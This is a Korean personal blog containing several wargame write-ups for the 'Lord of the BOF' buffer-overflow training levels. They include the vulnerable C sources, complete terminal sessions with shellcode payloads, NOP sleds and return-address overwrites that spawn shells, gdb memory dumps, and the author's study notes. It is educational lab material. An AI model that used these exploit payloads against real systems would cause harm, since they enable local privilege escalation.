[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core


warning: core file may not match specified executable file.

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

                                        켚Thjo??i0chi0tijY


                                                             ?y?投T?


Breakpoint 1, 0x8048506 in main ()

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

(중략)

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb) 

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb) 

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q  //여기서 앞에 nop를 안넣었다는 사실을 알아챔. 읽고 찾기 힘들어서 nop를 채웠습니다.

The program is running.  Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

     X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh  skeleton.c

[vampire@localhost vampire]$ oh shit  //원본 프로그램 날림 이히히히히 권한이 사라졌따!

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

                                                       SThjo??i0chi0tijY


                                                                           Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core


warning: core file may not match specified executable file.

Core was generated by `                                                                              '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

                                                                              켚Thjo??i0chi0tijY


                                                                                                   ?y?投T?


Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running.  Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton  `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass


...

중간에 프로그램을 날린 관계로

키는 찾아서 하겠습니다...ㅋ

아 안그래도 요즘 정신적으로 너무 힘든데 그나마 힐링되네요 힐링♥︎

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

golem->darkknight  (0) 2014.04.06
skeleton->golem  (5) 2014.03.17
troll->vampire  (0) 2013.12.22
orge->troll  (0) 2013.12.21
darkelf->orge  (0) 2013.11.22
반응형

흐아아앗!

흐콰한다!!

[troll@localhost troll]$ cat vampire.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - vampire

        - check 0xbfff

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

char buffer[40];


if(argc < 2){

printf("argv error\n");

exit(0);

}


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


        // here is changed!

        if(argv[1][46] == '\xff')            //페이로드의 47번째, 즉 ret부분의 주소가 \xbfff~~                                                                  형식이 아니어야 합니다

        {

                printf("but it's not forever\n");

                exit(0);

        }


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44, "\xff\xff\xfe\xbf", "\x90"x70000, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜???????????????????????????????????????????????????????????????????????????????????????????????????????????

(...생략)

????????????????????????????????j

                                     X?Rh//shh/bin??S?訴€

bash$ my-pass

euid = 509


처음봤을땐 '어미친 이거 뭔소리야' 이랬는데

스택은 메모리가 큰주소에서 작은주소로 자라잖아여!! 그래서 늘리는거야!! 쭉쭉!!!!

처음에는 0xbfffffff를 기준으로 nop를 넣거나 코어로 esp의 주소를 보고 그 기준으로 0xbffeffff까지의 거리를 재려고 했으나 그냥 대충 0xbfffffff 에서 0xbffeffff까지의 거리를 계산해서 nop를 마구 넣었더랬죠! (7만개 으캬캬컄)

그러니까 스택을 미친듯이 크게 늘려서!! 주소가 \xbffe~~가 될때까지!! 그리고 nopsled를 타고 쮹!!!!

진짜 되네요ㅋㅋㄷㄷ

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

skeleton->golem  (5) 2014.03.17
vampire->skeleton  (2) 2014.02.25
orge->troll  (0) 2013.12.21
darkelf->orge  (0) 2013.11.22
wolfman->darkelf  (0) 2013.11.21
반응형
ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ아 미친것같아요.

제가 지금 이걸 삽질한지 한달이 다되가는뎈ㅋㅋㅋㅋ

...하루만에 풀어버렸...

역시 안풀릴때는 처음으로 돌아가서 뭐든 다 날리고 다시시작하세여.

진리여.


밑의 더보기는 제 삽질(멘붕) 로그를 처음부터 끝까지 복붙한거에여.

멘탈건강을 위해 추천하지 않습니다. 밑에 또 정리해서 쓸거거든여.

하다가 멘붕와서 마구 엔터를 누른곳도.. 있기 때문에,

근데 많이 부족하다는걸 느낍니다.... 공부 열심히해야겠어요으어

풀이를 찾아보려고 하다가 아! 한번만 더 해보자! 했는데 풀렸쪙

그리고 스택은 어렵네요 아  머릿속에 그려지면서도 막 더 정보가 들어오면 뒤죽박죽이 됨..

그래서 해공예를 읽고있죠! 이번에 도움이 된것 같습니다ㅋㅋㅋ 



login: orge

Password: 

Last login: Fri Dec 13 09:58:07 from 192.168.0.1

[orge@localhost orge]$ ls

core

trall

trall.c

troll

troll.c

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` //심볼릭링크 생성.

[orge@localhost orge]$ cat trall.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - troll

        - check argc + argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


// here is changed

if(argc != 2){

printf("argc must be two!\n");

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);


// one more!

memset(argv[1], 0, strlen(argv[1])); /argv[1] 0으로 초기화, 고로 argv[0]에다가 넣어야함


}

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭 //하도 안되서 gdb로 코어를 뜯어보기로 했습니다.

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core


warning: core file may not match specified executable file.

Core was generated by `./?^12€l€?u楕凹2핽i00tii0cjo??T??

                                                                   귁?                            '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffac9 in ?? ()

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4    0xbffffad0    0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4    0x08048390

0xbffffab0: 0x080486ac 0x4000ae60 0xbffffabc    0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8    0xbffffbeb     0x00000000

0xbffffad0: 0xbffffc1c    0xbffffc2b    0xbffffc42    0xbffffc61

0xbffffae0: 0xbffffc83    0xbffffc8d    0xbffffe50    0xbffffe6f

0xbffffaf0: 0xbffffe89    0xbffffe9e    0xbffffeba     0xbffffec5

0xbffffb00: 0xbffffedd    0xbffffeea    0xbffffef2     0xbffffefc

0xbffffb10: 0xbfffff0c     0xbfffff1a     0xbfffff28     0xbfffff39

0xbffffb20: 0xbfffff44     0xbfffff54     0xbfffff94     0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb) 

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff     0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e  0xb1c9315      0x0e6c8032 0xe98001ff

0xbffffbc8:0xebf67501    0xffeae805      0xc132ffff     0x30306951

0xbffffbd8:0x30696974   0x8a6f6a63     0x8a5451e4 0x0cb19ae2

0xbffffbe8:0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`


????????????????????????????????????????????뫈

bash$ quit

sh: quit: command not found

bash$ exit

exit

[orge@localhost orge]$ ././`perl -e 'print  //여기서 길이때문에 안되는거였슴다. 크흡..

 "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

Segmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

bash$ my-pass

euid = 508


근데 일부러 'argv[0]주소가 바뀌나??? 에이 설마' 그러면서도 긴가민가해서 argv[0]의 주소를 체크하는 코드를 쭉 넣었는데, 왜 그 코드의 결과와 실제 argv[0]이 있던 장소가 다른건지는 모르겠어요. 누구 말씀해주실분...

컴이 버벅거려서 글이 더 써지지 않네요. 타자를 빨리치면 글자가 띄엄띄엄;; ㅠㅠ


NOTES(빡침주의)

arcg=전달되는 인자의 단어수

멤셋이 근데 argv[1]에 되어있는데 3에 넣지도 못하고 어떡하지

-심볼릭링크이용

-파일을 가르키고 있는 파일이라고 한다 포인터같은건가;; 아님 환경변수같은건가 

심볼릭링크를 쓰면 스택은 니친구야! 라고 뜬다 아빡쳐

\x2f때문이라고한다


음 그렇다면 페이로드

argv0으로 쉘코드넣고(심볼릭링크) argv0의 주소를 얻어내고 그 후 argv1로 bf를 인증한다. 그다음에 argv의 nopsled를 이용해 타고내려간다! 근데 없쪙! argv0의 주소를 알아내고 바로가는수밖에!

argv 1로 44바이트는 쓰레기값으로 채우고 그 후에 리턴어드레스를 넣으면..되나?


반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

vampire->skeleton  (2) 2014.02.25
troll->vampire  (0) 2013.12.22
darkelf->orge  (0) 2013.11.22
wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
반응형

[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// here is changed!

if(strlen(argv[0]) != 77){ //argv[0], 즉 (프로그램명)입력값이 77보다 작으면 에러가 납니다.

                printf("argv[0] error\n");

                exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'//우선은 프로그램명 길이를 77로 맟추고 공격시도

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //제대로 된 리턴어드레스를 넣고 공격.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0]=절대경로

./는 //가 몇개있어도 상관없다

.이랑 orgi=5

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데


반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

troll->vampire  (0) 2013.12.22
orge->troll  (0) 2013.12.21
wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20

+ Recent posts

티스토리툴바